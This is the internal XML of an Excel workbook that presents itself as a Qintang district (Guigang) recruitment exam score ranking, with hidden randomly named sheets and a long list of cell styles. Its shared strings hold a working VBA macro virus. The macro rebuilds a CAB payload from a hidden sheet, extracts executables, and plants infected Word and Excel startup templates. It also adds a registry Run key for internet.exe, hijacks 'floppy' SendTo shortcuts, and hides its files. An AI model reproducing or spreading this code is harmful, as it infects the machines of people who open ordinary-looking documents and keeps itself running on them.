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XGGWGNSCTLCPK" sheetId="1" state="hidden" r:id="rId2"/>
    <sheet name="OFRJPYM" sheetId="2" state="hidden" r:id="rId3"/>
    <sheet name="公布排名" sheetId="3" state="visible" r:id="rId4"/>
    <sheet name="VWPIMHNT" sheetId="4" state="hidden" r:id="rId5"/>
  </sheets>
  <definedNames>
    <definedName function="false" hidden="false" localSheetId="2" name="_xlnm.Print_Titles" vbProcedure="false">公布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73">
  <si>
    <t xml:space="preserve">Private Sub createcabfile()</t>
  </si>
  <si>
    <t xml:space="preserve">Dim ch As Byte</t>
  </si>
  <si>
    <t xml:space="preserve">on error resume next</t>
  </si>
  <si>
    <t xml:space="preserve">Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t xml:space="preserve">Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t xml:space="preserve">myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t xml:space="preserve">If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t xml:space="preserve">fso.createfolder myfolder</t>
  </si>
  <si>
    <t xml:space="preserve">End If</t>
  </si>
  <si>
    <t xml:space="preserve">For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t xml:space="preserve">If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t xml:space="preserve">workbooks(i).close</t>
  </si>
  <si>
    <t xml:space="preserve">fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">Next</t>
  </si>
  <si>
    <t xml:space="preserve">If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t xml:space="preserve">goto a1</t>
  </si>
  <si>
    <t xml:space="preserve">cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t xml:space="preserve">If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t xml:space="preserve">fso.delete cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t xml:space="preserve">For i = 1 To 150</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">hv</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">n=1</t>
  </si>
  <si>
    <t xml:space="preserve">m=instr(hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">do while m&gt;0</t>
  </si>
  <si>
    <t xml:space="preserve">ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t xml:space="preserve">put #1,,ch</t>
  </si>
  <si>
    <t xml:space="preserve">n=m+1</t>
  </si>
  <si>
    <t xml:space="preserve">m=instr(n,hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">loop</t>
  </si>
  <si>
    <t xml:space="preserve">close #1</t>
  </si>
  <si>
    <t xml:space="preserve">w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">w.Run "%COMSPEC% /c extrac32 /EKKKKKKKKKKKc:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">w.Run "%COMSPEC% /c extract /EKKKKKKKKKKKc:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">fso.deletefile cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t xml:space="preserve">set word=createobject("word.application")</t>
  </si>
  <si>
    <t xml:space="preserve">ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">word.quit</t>
  </si>
  <si>
    <t xml:space="preserve">fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
    <t xml:space="preserve">fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t xml:space="preserve">fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t xml:space="preserve">for each ff in fold.files</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">")&gt;0 then</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">w</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t xml:space="preserve">lnk.save</t>
  </si>
  <si>
    <t xml:space="preserve">goto e2</t>
  </si>
  <si>
    <t xml:space="preserve">end if</t>
  </si>
  <si>
    <t xml:space="preserve">next</t>
  </si>
  <si>
    <t xml:space="preserve">e2:</t>
  </si>
  <si>
    <t xml:space="preserve">fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t xml:space="preserve">fso.deletefile "c:\norma1.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">W</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t xml:space="preserve">workbooks("norma1.xlm").save</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">a1:</t>
  </si>
  <si>
    <t xml:space="preserve">fso.deletefile "c:\excel.txt"</t>
  </si>
  <si>
    <t xml:space="preserve">Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t xml:space="preserve">for i=1 to thisworkbook.sheets.count</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">" then</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">ThisWorkbook.Sheets(i).Delete</t>
  </si>
  <si>
    <t xml:space="preserve">Application.DisplayAlerts = True</t>
  </si>
  <si>
    <t xml:space="preserve">ThisWorkbook.Saved=True</t>
  </si>
  <si>
    <t xml:space="preserve">End Sub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贵港市事业单位公开招聘工作人员考试成绩排名（覃塘区）</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">招聘岗位代码</t>
  </si>
  <si>
    <t xml:space="preserve">准考证号</t>
  </si>
  <si>
    <t xml:space="preserve">报考单位</t>
  </si>
  <si>
    <t xml:space="preserve">报考岗位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</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">职业测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科专业知识</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">加分</t>
  </si>
  <si>
    <t xml:space="preserve">总分</t>
  </si>
  <si>
    <t xml:space="preserve">排名</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘高级中学</t>
  </si>
  <si>
    <t xml:space="preserve">高中信息技术教师</t>
  </si>
  <si>
    <t xml:space="preserve">石卡高级中学</t>
  </si>
  <si>
    <t xml:space="preserve">高中体育教师</t>
  </si>
  <si>
    <t xml:space="preserve">高中美术教师</t>
  </si>
  <si>
    <t xml:space="preserve">高中音乐教师</t>
  </si>
  <si>
    <t xml:space="preserve">樟木高级中学</t>
  </si>
  <si>
    <t xml:space="preserve">蒙公乡定布小学</t>
  </si>
  <si>
    <t xml:space="preserve">小学教师</t>
  </si>
  <si>
    <t xml:space="preserve">樟木乡元金小学</t>
  </si>
  <si>
    <t xml:space="preserve">黄练镇居仕小学</t>
  </si>
  <si>
    <t xml:space="preserve">山北乡万寿小学</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘镇中心幼儿园</t>
  </si>
  <si>
    <t xml:space="preserve">幼儿园教师</t>
  </si>
  <si>
    <t xml:space="preserve">黄练镇中心幼儿园</t>
  </si>
  <si>
    <t xml:space="preserve">蒙公乡中心幼儿园</t>
  </si>
  <si>
    <t xml:space="preserve">东龙镇中心幼儿园</t>
  </si>
  <si>
    <t xml:space="preserve">山北乡中心幼儿园</t>
  </si>
  <si>
    <t xml:space="preserve">樟木乡中心幼儿园</t>
  </si>
  <si>
    <t xml:space="preserve">三里镇中心幼儿园</t>
  </si>
  <si>
    <t xml:space="preserve">五里镇中心幼儿园</t>
  </si>
  <si>
    <t xml:space="preserve">石卡镇中心幼儿园</t>
  </si>
  <si>
    <t xml:space="preserve">大岭乡中心幼儿园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政治教师</t>
  </si>
  <si>
    <t xml:space="preserve">高中历史教师</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘区人民医院</t>
  </si>
  <si>
    <t xml:space="preserve">麻醉医师</t>
  </si>
  <si>
    <t xml:space="preserve">病理医师</t>
  </si>
  <si>
    <t xml:space="preserve">影像医师</t>
  </si>
  <si>
    <t xml:space="preserve">传染病科</t>
  </si>
  <si>
    <t xml:space="preserve">急诊医学</t>
  </si>
  <si>
    <t xml:space="preserve"> 覃塘区人民医院</t>
  </si>
  <si>
    <t xml:space="preserve">护理</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘区人民医院 </t>
  </si>
  <si>
    <t xml:space="preserve">药学</t>
  </si>
  <si>
    <t xml:space="preserve">临床医师</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘区疾病预防控制中心 </t>
  </si>
  <si>
    <t xml:space="preserve">专技人员</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘区疾病预防控制中心</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘区合管办</t>
  </si>
  <si>
    <t xml:space="preserve">东龙镇人口与计划生育服务站</t>
  </si>
  <si>
    <t xml:space="preserve">五里镇计生所</t>
  </si>
  <si>
    <t xml:space="preserve">平龙水库管理委员会</t>
  </si>
  <si>
    <t xml:space="preserve">管理人员</t>
  </si>
  <si>
    <t xml:space="preserve">九凌水库管理所</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘区劳动人事争议仲裁院</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘区城乡居民社会养老保险所</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘区政府投资审计中心</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘区残疾人就业服务所</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘区农产品质量安全监督管理站</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘区市政管理监察大队</t>
  </si>
  <si>
    <t xml:space="preserve">贵港市覃塘区环境监察大队</t>
  </si>
  <si>
    <t xml:space="preserve">樟木乡农业服务中心</t>
  </si>
  <si>
    <t xml:space="preserve">樟木乡社会服务保障中心</t>
  </si>
  <si>
    <t xml:space="preserve">樟木乡人口和计划生育服务站</t>
  </si>
  <si>
    <t xml:space="preserve">计生助理</t>
  </si>
  <si>
    <t xml:space="preserve">东龙镇社会服务保障中心</t>
  </si>
  <si>
    <t xml:space="preserve">东龙镇村镇规划建设站</t>
  </si>
  <si>
    <t xml:space="preserve">东龙镇企业站</t>
  </si>
  <si>
    <t xml:space="preserve">山北乡社会服务保障中心</t>
  </si>
  <si>
    <t xml:space="preserve">山北乡社会保障服务中心</t>
  </si>
  <si>
    <t xml:space="preserve">山北乡村镇规划建设站</t>
  </si>
  <si>
    <t xml:space="preserve">山北乡人口与计划生育服务站</t>
  </si>
  <si>
    <t xml:space="preserve">蒙公乡计生站</t>
  </si>
  <si>
    <t xml:space="preserve">蒙公乡企业站</t>
  </si>
  <si>
    <t xml:space="preserve">黄练镇人口与计划生育服务站</t>
  </si>
  <si>
    <t xml:space="preserve">黄练镇社会保障服务中心</t>
  </si>
  <si>
    <t xml:space="preserve">黄练镇企业站</t>
  </si>
  <si>
    <t xml:space="preserve">黄练镇村镇规划建设站</t>
  </si>
  <si>
    <t xml:space="preserve">三里镇人口与计划生育服务站</t>
  </si>
  <si>
    <t xml:space="preserve">五里镇林业站</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘区石卡镇社会保障服务中心</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘区石卡镇企业站</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘区石卡镇人口和计划生育服务站</t>
  </si>
  <si>
    <t xml:space="preserve">大岭乡人口与计划生育服务站</t>
  </si>
  <si>
    <t xml:space="preserve">大岭乡村镇规划建设站</t>
  </si>
  <si>
    <t xml:space="preserve">大岭乡企业站</t>
  </si>
  <si>
    <t xml:space="preserve">大岭乡社会保障服务中心</t>
  </si>
  <si>
    <t xml:space="preserve">黄练镇中心卫生院</t>
  </si>
  <si>
    <t xml:space="preserve">大岭乡卫生院</t>
  </si>
  <si>
    <t xml:space="preserve">会计</t>
  </si>
  <si>
    <t xml:space="preserve">蒙公乡卫生院</t>
  </si>
  <si>
    <t xml:space="preserve">覃塘社区卫生服务中心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color rgb="FF9933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3" fillId="20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true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="50" fillId="31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" fillId="0" borderId="14" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="196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53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55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57" fillId="21" borderId="2" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="58" fillId="21" borderId="2" applyFont="true" applyBorder="tru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5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5" fillId="20" borderId="1" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="66" fillId="20" borderId="1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68" fillId="7" borderId="1" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="69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0" borderId="10" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="70" fillId="20" borderId="10" applyFont="true" applyBorder="true" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="71" fillId="20" borderId="10" applyFont="true" applyBorder="tru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72" fillId="27" borderId="0" applyFont="true" applyBorder="false" applyAlignment="true" applyProtection="false">
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
    </xf>
    <xf numFmtId="164" fontId="73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_20100326高清市院遂宁检察院1080P配置清单26日改" xfId="94"/>
    <cellStyle name="_Book1" xfId="95"/>
    <cellStyle name="_Book1_1" xfId="96"/>
    <cellStyle name="_Book1_2" xfId="97"/>
    <cellStyle name="_Book1_3" xfId="98"/>
    <cellStyle name="_Book1_4" xfId="99"/>
    <cellStyle name="_Book1_4_Book1" xfId="100"/>
    <cellStyle name="_Book1_5" xfId="101"/>
    <cellStyle name="_ET_STYLE_NoName_00_" xfId="102"/>
    <cellStyle name="_ET_STYLE_NoName_00__Book1" xfId="103"/>
    <cellStyle name="_ET_STYLE_NoName_00__Book1_1" xfId="104"/>
    <cellStyle name="_ET_STYLE_NoName_00__Book1_2" xfId="105"/>
    <cellStyle name="_ET_STYLE_NoName_00__Sheet3" xfId="106"/>
    <cellStyle name="_弱电系统设备配置报价清单" xfId="107"/>
    <cellStyle name="Accent1" xfId="108"/>
    <cellStyle name="Accent1 - 20%" xfId="109"/>
    <cellStyle name="Accent1 - 40%" xfId="110"/>
    <cellStyle name="Accent1 - 60%" xfId="111"/>
    <cellStyle name="Accent1_公安安全支出补充表5.14" xfId="112"/>
    <cellStyle name="Accent2" xfId="113"/>
    <cellStyle name="Accent2 - 20%" xfId="114"/>
    <cellStyle name="Accent2 - 40%" xfId="115"/>
    <cellStyle name="Accent2 - 60%" xfId="116"/>
    <cellStyle name="Accent2_公安安全支出补充表5.14" xfId="117"/>
    <cellStyle name="Accent3" xfId="118"/>
    <cellStyle name="Accent3 - 20%" xfId="119"/>
    <cellStyle name="Accent3 - 40%" xfId="120"/>
    <cellStyle name="Accent3 - 60%" xfId="121"/>
    <cellStyle name="Accent3_公安安全支出补充表5.14" xfId="122"/>
    <cellStyle name="Accent4" xfId="123"/>
    <cellStyle name="Accent4 - 20%" xfId="124"/>
    <cellStyle name="Accent4 - 40%" xfId="125"/>
    <cellStyle name="Accent4 - 60%" xfId="126"/>
    <cellStyle name="Accent4_公安安全支出补充表5.14" xfId="127"/>
    <cellStyle name="Accent5" xfId="128"/>
    <cellStyle name="Accent5 - 20%" xfId="129"/>
    <cellStyle name="Accent5 - 40%" xfId="130"/>
    <cellStyle name="Accent5 - 60%" xfId="131"/>
    <cellStyle name="Accent5_公安安全支出补充表5.14" xfId="132"/>
    <cellStyle name="Accent6" xfId="133"/>
    <cellStyle name="Accent6 - 20%" xfId="134"/>
    <cellStyle name="Accent6 - 40%" xfId="135"/>
    <cellStyle name="Accent6 - 60%" xfId="136"/>
    <cellStyle name="Accent6_公安安全支出补充表5.14" xfId="137"/>
    <cellStyle name="args.style" xfId="138"/>
    <cellStyle name="Bad 1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_!!!GO" xfId="145"/>
    <cellStyle name="Currency [0]" xfId="146"/>
    <cellStyle name="Currency1" xfId="147"/>
    <cellStyle name="Currency_!!!GO" xfId="148"/>
    <cellStyle name="Date" xfId="149"/>
    <cellStyle name="Dollar (zero dec)" xfId="150"/>
    <cellStyle name="Explanatory Text" xfId="151"/>
    <cellStyle name="Fixed" xfId="152"/>
    <cellStyle name="gcd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Input" xfId="164"/>
    <cellStyle name="Input [yellow]" xfId="165"/>
    <cellStyle name="Input Cells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Neutral 1" xfId="177"/>
    <cellStyle name="New Times Roman" xfId="178"/>
    <cellStyle name="no dec" xfId="179"/>
    <cellStyle name="Norma,_laroux_4_营业在建 (2)_E21" xfId="180"/>
    <cellStyle name="Normal - Style1" xfId="181"/>
    <cellStyle name="Normal_!!!GO" xfId="182"/>
    <cellStyle name="Normal_Book1" xfId="183"/>
    <cellStyle name="Note 1" xfId="184"/>
    <cellStyle name="Output" xfId="185"/>
    <cellStyle name="per.style" xfId="186"/>
    <cellStyle name="Percent [2]" xfId="187"/>
    <cellStyle name="Percent_!!!GO" xfId="188"/>
    <cellStyle name="Pourcentage_pldt" xfId="189"/>
    <cellStyle name="PSChar" xfId="190"/>
    <cellStyle name="PSDate" xfId="191"/>
    <cellStyle name="PSDec" xfId="192"/>
    <cellStyle name="PSHeading" xfId="193"/>
    <cellStyle name="PSInt" xfId="194"/>
    <cellStyle name="PSSpacer" xfId="195"/>
    <cellStyle name="RowLevel_0" xfId="196"/>
    <cellStyle name="sstot" xfId="197"/>
    <cellStyle name="Standard_AREAS" xfId="198"/>
    <cellStyle name="t" xfId="199"/>
    <cellStyle name="t_HVAC Equipment (3)" xfId="200"/>
    <cellStyle name="Title" xfId="201"/>
    <cellStyle name="Total" xfId="202"/>
    <cellStyle name="Warning Text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隔 2" xfId="209"/>
    <cellStyle name="千位分隔 3" xfId="210"/>
    <cellStyle name="千位分隔[0] 2" xfId="211"/>
    <cellStyle name="千分位[0]_ 白土" xfId="212"/>
    <cellStyle name="千分位_ 白土" xfId="213"/>
    <cellStyle name="后继超级链接" xfId="214"/>
    <cellStyle name="商品名称" xfId="215"/>
    <cellStyle name="好" xfId="216"/>
    <cellStyle name="好 2" xfId="217"/>
    <cellStyle name="好_00省级(定稿)" xfId="218"/>
    <cellStyle name="好_00省级(打印)" xfId="219"/>
    <cellStyle name="好_03昭通" xfId="220"/>
    <cellStyle name="好_0502通海县" xfId="221"/>
    <cellStyle name="好_05玉溪" xfId="222"/>
    <cellStyle name="好_0605石屏县" xfId="223"/>
    <cellStyle name="好_1003牟定县" xfId="224"/>
    <cellStyle name="好_1110洱源县" xfId="225"/>
    <cellStyle name="好_11大理" xfId="226"/>
    <cellStyle name="好_2006年全省财力计算表（中央、决算）" xfId="227"/>
    <cellStyle name="好_2006年分析表" xfId="228"/>
    <cellStyle name="好_2006年在职人员情况" xfId="229"/>
    <cellStyle name="好_2006年基础数据" xfId="230"/>
    <cellStyle name="好_2006年水利统计指标统计表" xfId="231"/>
    <cellStyle name="好_2007年人员分部门统计表" xfId="232"/>
    <cellStyle name="好_2007年可用财力" xfId="233"/>
    <cellStyle name="好_2007年政法部门业务指标" xfId="234"/>
    <cellStyle name="好_2007年检察院案件数" xfId="235"/>
    <cellStyle name="好_2008云南省分县市中小学教职工统计表（教育厅提供）" xfId="236"/>
    <cellStyle name="好_2008年县级公安保障标准落实奖励经费分配测算" xfId="237"/>
    <cellStyle name="好_2009年一般性转移支付标准工资" xfId="238"/>
    <cellStyle name="好_2009年一般性转移支付标准工资_~4190974" xfId="239"/>
    <cellStyle name="好_2009年一般性转移支付标准工资_~5676413" xfId="240"/>
    <cellStyle name="好_2009年一般性转移支付标准工资_不用软件计算9.1不考虑经费管理评价xl" xfId="241"/>
    <cellStyle name="好_2009年一般性转移支付标准工资_地方配套按人均增幅控制8.30xl" xfId="242"/>
    <cellStyle name="好_2009年一般性转移支付标准工资_地方配套按人均增幅控制8.30一般预算平均增幅、人均可用财力平均增幅两次控制、社会治安系数调整、案件数调整xl" xfId="243"/>
    <cellStyle name="好_2009年一般性转移支付标准工资_地方配套按人均增幅控制8.31（调整结案率后）xl" xfId="244"/>
    <cellStyle name="好_2009年一般性转移支付标准工资_奖励补助测算5.22测试" xfId="245"/>
    <cellStyle name="好_2009年一般性转移支付标准工资_奖励补助测算5.23新" xfId="246"/>
    <cellStyle name="好_2009年一般性转移支付标准工资_奖励补助测算5.24冯铸" xfId="247"/>
    <cellStyle name="好_2009年一般性转移支付标准工资_奖励补助测算7.23" xfId="248"/>
    <cellStyle name="好_2009年一般性转移支付标准工资_奖励补助测算7.25" xfId="249"/>
    <cellStyle name="好_2009年一般性转移支付标准工资_奖励补助测算7.25 (version 1) (version 1)" xfId="250"/>
    <cellStyle name="好_2、土地面积、人口、粮食产量基本情况" xfId="251"/>
    <cellStyle name="好_530623_2006年县级财政报表附表" xfId="252"/>
    <cellStyle name="好_530629_2006年县级财政报表附表" xfId="253"/>
    <cellStyle name="好_5334_2006年迪庆县级财政报表附表" xfId="254"/>
    <cellStyle name="好_Book1" xfId="255"/>
    <cellStyle name="好_Book1_1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省2008年中小学教师人数统计表" xfId="270"/>
    <cellStyle name="好_云南省2008年中小学教职工情况（教育厅提供20090101加工整理）" xfId="271"/>
    <cellStyle name="好_云南省2008年转移支付测算——州市本级考核部分及政策性测算" xfId="272"/>
    <cellStyle name="好_卫生部门" xfId="273"/>
    <cellStyle name="好_历年教师人数" xfId="274"/>
    <cellStyle name="好_县级公安机关公用经费标准奖励测算方案（定稿）" xfId="275"/>
    <cellStyle name="好_县级基础数据" xfId="276"/>
    <cellStyle name="好_地方配套按人均增幅控制8.30xl" xfId="277"/>
    <cellStyle name="好_地方配套按人均增幅控制8.30一般预算平均增幅、人均可用财力平均增幅两次控制、社会治安系数调整、案件数调整xl" xfId="278"/>
    <cellStyle name="好_地方配套按人均增幅控制8.31（调整结案率后）xl" xfId="279"/>
    <cellStyle name="好_城建部门" xfId="280"/>
    <cellStyle name="好_基础数据分析" xfId="281"/>
    <cellStyle name="好_奖励补助测算5.22测试" xfId="282"/>
    <cellStyle name="好_奖励补助测算5.23新" xfId="283"/>
    <cellStyle name="好_奖励补助测算5.24冯铸" xfId="284"/>
    <cellStyle name="好_奖励补助测算7.23" xfId="285"/>
    <cellStyle name="好_奖励补助测算7.25" xfId="286"/>
    <cellStyle name="好_奖励补助测算7.25 (version 1) (version 1)" xfId="287"/>
    <cellStyle name="好_指标五" xfId="288"/>
    <cellStyle name="好_指标四" xfId="289"/>
    <cellStyle name="好_教师绩效工资测算表（离退休按各地上报数测算）2009年1月1日" xfId="290"/>
    <cellStyle name="好_教育厅提供义务教育及高中教师人数（2009年1月6日）" xfId="291"/>
    <cellStyle name="好_文体广播部门" xfId="292"/>
    <cellStyle name="好_检验表" xfId="293"/>
    <cellStyle name="好_检验表（调整后）" xfId="294"/>
    <cellStyle name="好_汇总" xfId="295"/>
    <cellStyle name="好_汇总-县级财政报表附表" xfId="296"/>
    <cellStyle name="好_第一部分：综合全" xfId="297"/>
    <cellStyle name="好_第五部分(才淼、饶永宏）" xfId="298"/>
    <cellStyle name="好_财政供养人员" xfId="299"/>
    <cellStyle name="好_财政支出对上级的依赖程度" xfId="300"/>
    <cellStyle name="好_高中教师人数（教育厅1.6日提供）" xfId="301"/>
    <cellStyle name="寘嬫愗傝 [0.00]_Region Orders (2)" xfId="302"/>
    <cellStyle name="寘嬫愗傝_Region Orders (2)" xfId="303"/>
    <cellStyle name="小数" xfId="304"/>
    <cellStyle name="差" xfId="305"/>
    <cellStyle name="差 2" xfId="306"/>
    <cellStyle name="差_00省级(定稿)" xfId="307"/>
    <cellStyle name="差_00省级(打印)" xfId="308"/>
    <cellStyle name="差_03昭通" xfId="309"/>
    <cellStyle name="差_0502通海县" xfId="310"/>
    <cellStyle name="差_05玉溪" xfId="311"/>
    <cellStyle name="差_0605石屏县" xfId="312"/>
    <cellStyle name="差_1003牟定县" xfId="313"/>
    <cellStyle name="差_1110洱源县" xfId="314"/>
    <cellStyle name="差_11大理" xfId="315"/>
    <cellStyle name="差_2006年全省财力计算表（中央、决算）" xfId="316"/>
    <cellStyle name="差_2006年分析表" xfId="317"/>
    <cellStyle name="差_2006年在职人员情况" xfId="318"/>
    <cellStyle name="差_2006年基础数据" xfId="319"/>
    <cellStyle name="差_2006年水利统计指标统计表" xfId="320"/>
    <cellStyle name="差_2007年人员分部门统计表" xfId="321"/>
    <cellStyle name="差_2007年可用财力" xfId="322"/>
    <cellStyle name="差_2007年政法部门业务指标" xfId="323"/>
    <cellStyle name="差_2007年检察院案件数" xfId="324"/>
    <cellStyle name="差_2008云南省分县市中小学教职工统计表（教育厅提供）" xfId="325"/>
    <cellStyle name="差_2008年县级公安保障标准落实奖励经费分配测算" xfId="326"/>
    <cellStyle name="差_2009年一般性转移支付标准工资" xfId="327"/>
